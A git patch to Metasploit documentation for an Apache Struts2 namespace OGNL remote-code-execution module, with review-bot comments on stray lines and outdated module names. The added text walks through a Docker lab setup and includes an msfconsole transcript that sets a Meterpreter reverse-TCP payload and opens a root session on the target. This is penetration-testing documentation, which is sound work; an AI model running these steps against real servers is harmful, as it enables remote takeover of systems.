From da7a29f7156337bae69efe0873cd119904992551 Mon Sep 17 00:00:00 2001 From: asoto-r7 Date: Fri, 31 Aug 2018 13:57:41 -0500 Subject: [PATCH] Documentation update --- ...space_rce.md => struts2_namespace_ognl.md} | 30 +++++++++++++++++-- 1 file changed, 28 insertions(+), 2 deletions(-) rename documentation/modules/exploit/multi/http/{struts_namespace_rce.md => struts2_namespace_ognl.md} (81%) diff --git a/documentation/modules/exploit/multi/http/struts_namespace_rce.md b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md similarity index 81% rename from documentation/modules/exploit/multi/http/struts_namespace_rce.md rename to documentation/modules/exploit/multi/http/struts2_namespace_ognl.md index 5c6ff21ed2..0650292743 100644 --- a/documentation/modules/exploit/multi/http/struts_namespace_rce.md +++ b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md @@ -50,6 +50,7 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20 ``` 8. Upon completion, the container will shutdown and you'll return to the host environment. Restart the container, now with a vulnerable endpoint: +msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134 ``` sudo docker start $CONTAINER_ID ``` @@ -83,7 +84,10 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20 - [ ] You will not be given a shell (yet). Confirm that payload upload and execution works: - - [ ] It doesn't (yet). + - [ ] Set a payload, e.g.: ```set PAYLOAD linux/x64/meterpreter/reverse_tcp``` + - [ ] Configure `LHOST` and `RHOST` as necessary. + - [ ] Run the exploit: ```run``` +msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134 ## Options **TARGETURI** 
@@ -98,7 +102,7 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20 ### Version of software and OS as applicable - Checking a vulnerable endpoint, as installed in the above steps. + Checking a vulnerable endpoint, as installed in the above steps: ``` msf > use exploit/multi/http/struts_namespace_rce @@ -127,3 +131,25 @@ b3d9b350d9b6 [*] Exploit completed, but no session was created. msf5 exploit(multi/http/struts_namespace_rce) > ``` + + Getting a Meterpreter session on the above-described environment: + +``` + +msf5 > use exploit/multi/http/struts2_namespace_ognl +msf5 exploit(multi/http/struts2_namespace_ognl) > set ACTION help.action +msf5 exploit(multi/http/struts2_namespace_ognl) > set RHOSTS 192.168.199.135 +msf5 exploit(multi/http/struts2_namespace_ognl) > set RPORT 32771 +msf5 exploit(multi/http/struts2_namespace_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp +msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134 +msf5 exploit(multi/http/struts2_namespace_ognl) > run + +[*] Started reverse TCP handler on 192.168.199.134:4444 +[+] Target profiled successfully: Linux 4.4.0-112-generic amd64, running as root +[+] Payload successfully dropped and executed. +[*] Sending stage (816260 bytes) to 192.168.199.135 +[*] Meterpreter session 1 opened (192.168.199.134:4444 -> 192.168.199.135:47482) at 2018-08-31 13:15:22 -0500 + +meterpreter > +``` +
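Review bot: in hunk `@@ -50,6 +50,7 @@`, the added line `+msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134` lands in the middle of setup step 8, between the prose "Restart the container, now with a vulnerable endpoint:" and the `sudo docker start $CONTAINER_ID` fence, where it is neither a shell command nor part of any msfconsole transcript; it reads like a stray paste from the session transcript added at the end of the file and should be dropped from this hunk.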
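Review bot: in hunk `@@ -83,7 +84,10 @@`, the same stray `+msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134` line is appended after the `- [ ] Run the exploit: ```run```` checklist item, directly before the `## Options` heading, outside any fence and any list; remove it. Minor style point on the new checklist items: ```set PAYLOAD linux/x64/meterpreter/reverse_tcp``` and ```run``` use triple backticks inline while the neighbouring `LHOST` and `RHOST` use single backticks; single backticks are the inline form, triple backticks are for fenced blocks.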
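Review bot: in hunk `@@ -98,7 +102,7 @@`, the trailing context line `msf > use exploit/multi/http/struts_namespace_rce` still loads the module by its old path, which no longer resolves once this patch renames the documentation to `struts2_namespace_ognl`; the punctuation fix to "Checking a vulnerable endpoint, as installed in the above steps:" is fine, but the command below it should be updated to `use exploit/multi/http/struts2_namespace_ognl` so the walk-through does not point readers at a module that does not exist.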
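Review bot: in hunk `@@ -127,3 +131,25 @@`, the preceding context prompt `msf5 exploit(multi/http/struts_namespace_rce) >` still shows the old module name while the new transcript directly below it uses `exploit/multi/http/struts2_namespace_ognl`; update the earlier transcript so both examples agree with the renamed module. Also, the new fence after "Getting a Meterpreter session on the above-described environment:" opens with an empty line before the first `msf5 >` prompt, and the paragraph itself carries a leading space; drop both so the block is formatted like the transcript above it.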